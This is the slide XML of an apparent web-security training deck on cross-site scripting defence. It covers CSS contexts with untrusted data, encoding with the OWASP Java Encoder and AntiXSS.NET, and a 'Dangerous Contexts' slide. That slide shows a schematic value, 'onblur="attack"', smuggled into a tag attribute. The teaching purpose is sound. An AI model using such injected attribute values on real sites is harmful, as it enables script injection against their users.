                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>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17" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7327992" y="616218"/>
              <a:ext cx="475132" cy="1477328"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="9600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2470197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
              <a:t>CSS Encoding Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1796793"/>
            <a:ext cx="8229052" cy="2269589"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="2269589"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 25"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8" b="35941"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854128"/>
              <a:ext cx="8229052" cy="1920240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4044511"/>
              <a:ext cx="7895852" cy="1683859"/>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b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;div style="background: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>url</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>('</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>');</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="mr-IN" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;style type="text/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>css</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>background-color:'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>';</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;/style&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28"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CSS Hex Escaping</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7091102" y="457200"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="Group 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="Oval 34"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent5"/>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34" name="TextBox 33"/>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CSS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1154963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
              <a:t>CSS Encoding Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1796793"/>
            <a:ext cx="8229052" cy="2269589"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="2269589"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 25"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8" b="35941"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854128"/>
              <a:ext cx="8229052" cy="1920240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4044511"/>
              <a:ext cx="7895852" cy="1354217"/>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600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;div style="background: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>url</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>('&lt;%=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encode.forCssUrl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>value</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>)%&gt;');</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="mr-IN" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;style type="text/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>css</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>background-color:'&lt;%=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encode.forCssString</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>value</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>)%&gt;';</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;/style&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28"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bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>OWASP Java Encoder</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4353694"/>
            <a:ext cx="8229052" cy="1080869"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="1080869"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Picture 29" descr="codewindow.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3" cstate="print">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect t="-1565" b="76565"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854128"/>
              <a:ext cx="8229052" cy="731520"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4044511"/>
              <a:ext cx="7895852" cy="270843"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square"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600" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encoder.CssEncode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>value</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Content Placeholder 2"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3504779"/>
              <a:ext cx="8229052" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AntiXSS.NET</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7091102" y="457200"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="Group 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="Oval 34"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent5"/>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34" name="TextBox 33"/>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CSS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2457245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Escaping Final Thoughts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="924357030"/>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Dangerous Contexts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1368425"/>
            <a:ext cx="7158625" cy="5132583"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are just certain places in HTML documents where you cannot place untrusted data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Danger: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;a $DATA&gt;       $DATA  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onblur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
